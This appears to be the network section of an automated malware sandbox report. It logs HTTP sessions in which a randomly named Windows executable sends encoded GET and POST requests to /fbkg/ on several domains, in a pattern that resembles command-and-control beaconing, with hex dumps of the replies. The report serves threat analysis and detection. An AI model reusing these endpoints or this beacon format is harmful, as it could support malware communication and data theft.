                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o0JWX0fdbBhURzP6G1b7DIcOCh6eXHibPIR5mmakWH5sJIM1iw5y8il6ueIB9ReBEOox9ibPaRVeRbWjcZnosxWZfSuIxt5OKAjHGt16RSjzSz2TW2oQIwwBWESSQ1YjqVK642Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a0cb1fb365e71-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                58104.21.52.18280192.168.11.2050185C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:15.460530043 CET1237OUTGET /fbkg/?T6I=p9Bv2ZaqDj0B+e+ypRT8GlSwNlQxTeh6EqXXTwB9+WRzCtFNeIn1Fpb3phnzmJVlQdbT0fpxscdkLw+HDUtKzdkzARk7C/olAA==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.scoopstarz.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:31:15.717394114 CET1237INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:15 GMT
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o0JWX0fdbBhURzP6G1b7DIcOCh6eXHibPIR5mmakWH5sJIM1iw5y8il6ueIB9ReBEOox9ibPaRVeRbWjcZnosxWZfSuIxt5OKAjHGt16RSjzSz2TW2oQIwwBWESSQ1YjqVK642Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a0cb1fb365e71-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                59104.21.46.23680192.168.11.2050186C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:23.865303040 CET1238OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=LfqpcTqkrXaBnJID5l2tM8vOpSRv3MUMZfXyeB4RyH13MNyf/Jo5B8vwZE/hs/QEee4rKHvEo4v47oiItb+YS33BVH+SYzpbOQ== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.342448.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:31:24.499762058 CET1239INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:24 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mMwNtH26i1vt7iSkY5qqDWR0dQj7HPvVl8iN11AWlErr177z4jy%2BkG6jV72gBeK%2BRe9DGkguNuMbrC069sGq%2BW6SivEx8ldurHh4rqOixCAgkKcxfbAhKcmgQRjwivzLOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a0ce67c73180d-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                Data Raw: 34 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f
                                                                                                                                                                                                Data Ascii: 475<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;co
                                                                                                                                                                                                Nov 17, 2023 19:31:24.499849081 CET1240INData Raw: 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b
                                                                                                                                                                                                Data Ascii: lor:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1
                                                                                                                                                                                                Nov 17, 2023 19:31:24.499902010 CET1240INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                59192.168.11.2050186104.21.46.23680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:23.865303040 CET1238OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=LfqpcTqkrXaBnJID5l2tM8vOpSRv3MUMZfXyeB4RyH13MNyf/Jo5B8vwZE/hs/QEee4rKHvEo4v47oiItb+YS33BVH+SYzpbOQ== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.342448.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:31:24.499762058 CET1239INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:24 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mMwNtH26i1vt7iSkY5qqDWR0dQj7HPvVl8iN11AWlErr177z4jy%2BkG6jV72gBeK%2BRe9DGkguNuMbrC069sGq%2BW6SivEx8ldurHh4rqOixCAgkKcxfbAhKcmgQRjwivzLOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a0ce67c73180d-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                Data Raw: 34 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f
                                                                                                                                                                                                Data Ascii: 475<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;co
                                                                                                                                                                                                Nov 17, 2023 19:31:24.499849081 CET1240INData Raw: 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b
                                                                                                                                                                                                Data Ascii: lor:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1
                                                                                                                                                                                                Nov 17, 2023 19:31:24.499902010 CET1240INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                691.195.240.12380192.168.11.2050133C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:29.846501112 CET363OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=B+yQ+pjtA1uH9kIbT9UDa6ioLlAzFDWribQtTvCQrHw4q8RUF3EGwezQb+sVDJCf8fKvHmDMhbppDTWW+s4B7GFBFpTEoA5eSA== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:26:30.032459974 CET363INHTTP/1.1 436
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:26:29 GMT
                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                6192.168.11.205013391.195.240.12380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:29.846501112 CET363OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=B+yQ+pjtA1uH9kIbT9UDa6ioLlAzFDWribQtTvCQrHw4q8RUF3EGwezQb+sVDJCf8fKvHmDMhbppDTWW+s4B7GFBFpTEoA5eSA== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:26:30.032459974 CET363INHTTP/1.1 436
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:26:29 GMT
                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                6091.195.240.12380192.168.11.2050187C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:37.857218981 CET1241OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 30 58 63 38 52 73 38 6b 64 61 43 69 63 42 45 6e 4e 52 4f 6f 2f 37 49 50 54 4e 43 31 72 48 4d 5a 36 64 4e 71 59 77 4d 42 6b 5a 53 38 55 4b 59 2f 50 74 43 64 6f 71 4b 4c 45 48 4c 2b 6f 70 6b 65 46 32 2b 79 2f 2b 39 37 34 6d 4e 49 44 39 72 7a 74 6a 77 41 48 75 53 34 31 79 37 5a 79 45 6c 4c 72 33 79 70 30 69 63 61 6e 6d 57 32 61 35 69 62 39 4d 6c 4f 67 49 36 54 66 75 70 32 63 59 6b 48 4a 38 6e 56 72 68 48 32 49 41 34 44 4f 6a 36 79 30 35 54 33 4c 4f 4c 69 62 76 78 33 2b 74 64 49 59 31 65 57 70 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=M8aw9fXlF22U0Xc8Rs8kdaCicBEnNROo/7IPTNC1rHMZ6dNqYwMBkZS8UKY/PtCdoqKLEHL+opkeF2+y/+974mNID9rztjwAHuS41y7ZyElLr3yp0icanmW2a5ib9MlOgI6Tfup2cYkHJ8nVrhH2IA4DOj6y05T3LOLibvx3+tdIY1eWpw==
                                                                                                                                                                                                Nov 17, 2023 19:31:38.045366049 CET1242INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:31:37 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                60192.168.11.205018791.195.240.12380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:37.857218981 CET1241OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 30 58 63 38 52 73 38 6b 64 61 43 69 63 42 45 6e 4e 52 4f 6f 2f 37 49 50 54 4e 43 31 72 48 4d 5a 36 64 4e 71 59 77 4d 42 6b 5a 53 38 55 4b 59 2f 50 74 43 64 6f 71 4b 4c 45 48 4c 2b 6f 70 6b 65 46 32 2b 79 2f 2b 39 37 34 6d 4e 49 44 39 72 7a 74 6a 77 41 48 75 53 34 31 79 37 5a 79 45 6c 4c 72 33 79 70 30 69 63 61 6e 6d 57 32 61 35 69 62 39 4d 6c 4f 67 49 36 54 66 75 70 32 63 59 6b 48 4a 38 6e 56 72 68 48 32 49 41 34 44 4f 6a 36 79 30 35 54 33 4c 4f 4c 69 62 76 78 33 2b 74 64 49 59 31 65 57 70 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=M8aw9fXlF22U0Xc8Rs8kdaCicBEnNROo/7IPTNC1rHMZ6dNqYwMBkZS8UKY/PtCdoqKLEHL+opkeF2+y/+974mNID9rztjwAHuS41y7ZyElLr3yp0icanmW2a5ib9MlOgI6Tfup2cYkHJ8nVrhH2IA4DOj6y05T3LOLibvx3+tdIY1eWpw==
                                                                                                                                                                                                Nov 17, 2023 19:31:38.045366049 CET1242INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:31:37 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
